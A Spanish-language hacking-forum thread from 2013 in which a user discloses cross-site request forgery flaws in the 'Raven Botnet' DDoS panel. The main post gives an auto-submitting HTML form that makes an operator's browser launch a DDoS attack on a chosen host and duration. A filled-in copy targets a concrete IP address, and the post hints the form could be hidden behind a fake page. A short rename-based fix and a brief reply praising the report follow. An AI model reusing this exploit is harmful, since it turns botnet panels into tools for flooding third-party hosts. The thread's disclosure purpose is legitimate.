This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

CSRF Raven Botnet

  • 2 Replies
  • 3478 Views

0 Members and 1 Guest are viewing this topic.

Offline Metadato

  • *
  • Underc0der
  • Posts: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • View Profile

CSRF Raven Botnet

  • on: August 28, 2013, 01:55:33 pm
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Code: (html5) You are not allowed to view links. Register or Login
<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>

Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Code: (html5) You are not allowed to view links. Register or Login
<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
<input type="hidden" name="target" value="173.194.34.248">
<input type="hidden" name="time" value="500">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>

Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Code: (php) You are not allowed to view links. Register or Login
echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';

Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D
« Last Edit: August 29, 2013, 07:04:38 am by Metadato »

Offline Réplica1

  • *
  • Underc0der
  • Posts: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • View Profile
    • @Pekador - Twitter

Re:CSRF Raven Botnet

  • on: August 28, 2013, 02:33:37 pm
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!


Offline Metadato

  • *
  • Underc0der
  • Posts: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • View Profile

Re:CSRF Raven Botnet

  • on: August 29, 2013, 11:12:07 am
You are not allowed to view links. Register or Login
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.
« Last Edit: August 30, 2013, 10:32:44 am by Metadato »